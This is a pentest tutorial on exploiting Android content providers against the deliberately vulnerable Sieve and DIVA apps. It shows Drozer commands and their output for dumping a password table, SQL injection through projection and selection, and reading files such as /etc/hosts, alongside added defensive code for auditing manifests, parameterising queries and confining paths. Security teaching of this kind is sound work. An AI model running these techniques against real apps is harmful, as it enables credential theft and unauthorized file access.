Exploiting Content Providers


Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Introduction

Data is supplied from one application to another on request through a component called a content provider. These requests are handled through the methods of the ContentResolver class. Content providers can keep their data in various places, such as a database, files, or over the network.

In the Manifest.xml file, a declaration of the content provider is required. For example:

<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>

To access content://com.mwr.example.sieve.DBContentProvider/Keys, the READ_KEYS permission is required. It is interesting to note that the path /Keys/ is accessible in the following section, which is not protected due to a mistake by the developer, who secured /Keys but declared /Keys/.
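As an added example (not from the original page or the Sieve app), the following Python audit parses a manifest and reports the two weaknesses described above: an exported provider with no provider-level permission, and a path-permission that uses a literal android:path, which guards only that exact string. The manifest text is constructed from the snippet above.

```python
# Added example: audit AndroidManifest.xml for exported content providers.
# The manifest text is constructed from the Sieve snippet on this page.
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.mwr.example.sieve">
  <application>
    <provider android:name=".DBContentProvider" android:exported="true"
              android:authorities="com.mwr.example.sieve.DBContentProvider">
      <path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS"
                       android:writePermission="com.mwr.example.sieve.WRITE_KEYS"
                       android:path="/Keys"/>
    </provider>
    <provider android:name=".FileBackupProvider" android:exported="true"
              android:authorities="com.mwr.example.sieve.FileBackupProvider"/>
  </application>
</manifest>"""


def audit_providers(manifest_xml):
    """Return one finding per risky provider setting (empty list = nothing found)."""
    findings = []
    for prov in ET.fromstring(manifest_xml).iter("provider"):
        name = prov.get(ANDROID + "name")
        if prov.get(ANDROID + "exported") != "true":
            continue  # only explicit exports are considered reachable here
        # No android:permission / readPermission on the provider itself means
        # every path that lacks its own path-permission is readable by any app.
        if not (prov.get(ANDROID + "permission") or prov.get(ANDROID + "readPermission")):
            findings.append(f"{name}: exported without a provider-level read permission")
        for pp in prov.findall("path-permission"):
            literal = pp.get(ANDROID + "path")
            if literal is None:
                continue  # pathPrefix / pathPattern cover sub-paths as well
            # PATTERN_LITERAL matches the exact string only, so "/Keys" leaves
            # "/Keys/" unguarded; android:pathPrefix="/Keys" would cover both.
            findings.append(f"{name}: literal path-permission {literal} does not cover {literal}/")
    return findings


if __name__ == "__main__":
    for line in audit_providers(SAMPLE_MANIFEST):
        print(line)
```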

You may be able to access private data or exploit some vulnerability (SQL Injection or Path Traversal).

Get information from exposed content providers

dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False

It is possible to piece together how to reach the DBContentProvider by starting URIs with "content://". This approach is based on the insight gained from using Drozer, where the key information was located in the /Keys directory.

Drozer can guess and try several URIs:

dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

You should also check the ContentProvider code to look for queries:

Also, if you cannot find full queries, you can check which names are declared by the ContentProvider in the onCreate method:

The query will look like: content://name.of.package.class/declared_name

Database-backed Content Providers

Probably most Content Providers are used as an interface for a database. Therefore, if you can access one you may be able to extract, update, insert and delete information. Check whether you can access sensitive information, or try to change it in order to bypass authorization mechanisms.

When checking the code of the Content Provider, also look for functions with names like: query, insert, update and delete:

Because you will be able to call them.

Query content

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com

Insert content

By querying the database you will learn the names of the columns; then, you may be able to insert data into the DB:

Note that for insert and update you can use --string to indicate a string, --double to indicate a double, and likewise --float, --integer, --long, --short and --boolean.

Update content

Knowing the names of the columns, you can also modify the entries:

Delete content

SQL Injection

It is simple to test for SQL injection (SQLite) by manipulating the projection and selection fields that are passed to the content provider. When querying a Content Provider there are two interesting arguments for extracting information: --selection and --projection:

You can try to abuse these parameters to test for SQL injection:

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
FROM SQLITE_MASTER WHERE type='table';--"
| type  | name             | tbl_name         | rootpage | sql              |
| table | android_metadata | android_metadata | 3        | CREATE TABLE ... |
| table | Passwords        | Passwords        | 4        | CREATE TABLE ... |
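To make the mechanism behind the output above concrete, here is an added Python model (not the Sieve app's code) of a provider that concatenates the caller's projection and selection into the SQL, next to a hardened version that checks the projection against the table's known columns and binds the selection value as a parameter, the same idea as a projection map and strict mode in Android's SQLiteQueryBuilder. The Passwords table and its single row are constructed from the query output on this page.

```python
# Added example: a Python model of the Sieve Passwords query, not the app's code.
# The table and its row are constructed from the drozer output on this page.
import sqlite3

COLUMNS = ("_id", "service", "username", "password", "email")


def open_sample_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, "
               "username TEXT, password TEXT, email TEXT)")
    db.execute("INSERT INTO Passwords VALUES (1, 'Email', 'incognitoguy50', "
               "'PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==', 'incognitoguy50@gmail.com')")
    return db


def query_unsafe(db, projection, selection):
    # Caller-controlled strings are pasted straight into the statement. This is
    # the shape behind "SELECT * FROM Passwords WHERE (')" in the drozer output:
    # a projection can replace the whole FROM clause and comment out the rest.
    sql = f"SELECT {projection} FROM Passwords WHERE ({selection})"
    return db.execute(sql).fetchall()


def query_hardened(db, projection, where_column, where_value):
    # Projection entries must be known column names (a projection map), and the
    # selection value travels as a bound parameter, never inside the SQL text.
    columns = [c.strip() for c in projection.split(",")]
    if any(c not in COLUMNS for c in columns):
        raise ValueError("projection must name only known columns")
    if where_column not in COLUMNS:
        raise ValueError("selection column unknown")
    sql = f"SELECT {', '.join(columns)} FROM Passwords WHERE {where_column} = ?"
    return db.execute(sql, (where_value,)).fetchall()


def projection_is_rejected(db, projection):
    """True when the hardened query refuses a projection the unsafe one accepts."""
    try:
        query_hardened(db, projection, "_id", 1)
    except ValueError:
        return True
    return False
```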

Automatic SQL injection discovery with Drozer

dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
android_metadata
notes
sqlite_sequence

File System-backed Content Providers

Content providers can also be used to access files:

Read file

You can read files from the Content Provider:

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

Path Traversal

If you can access files, you can try to abuse a Path Traversal (in this case it is not needed, but you can try using "../" and similar tricks).

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost
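An added Python sketch (not the Sieve FileBackupProvider) of how the file-opening side of such a provider should resolve the requested path so that neither an absolute path such as /etc/hosts nor a "../" sequence can reach outside the provider's backup directory. The base directory is a constructed placeholder.

```python
# Added example: confine file-backed provider reads to one directory.
# BACKUP_DIR is a constructed placeholder, not a path from the Sieve app.
import os

BACKUP_DIR = "/data/data/com.example.app/files/backup"


def resolve_unsafe(uri_path):
    # What a provider does when it hands the URI path straight to the file API:
    # "/etc/hosts" is opened verbatim, which is why no traversal is even needed.
    return uri_path


def resolve_contained(uri_path, base_dir=BACKUP_DIR):
    base = os.path.realpath(base_dir)
    # os.path.join discards base when uri_path is absolute, and realpath
    # collapses "..", so the prefix check below catches both escape routes.
    target = os.path.realpath(os.path.join(base, uri_path))
    if not target.startswith(base + os.sep):
        raise PermissionError(f"refusing to open {uri_path!r}: outside {base_dir}")
    return target


def is_allowed(uri_path):
    """True when the contained resolver would open uri_path."""
    try:
        resolve_contained(uri_path)
    except PermissionError:
        return False
    return True
```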

Automatic Path Traversal discovery with Drozer

dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
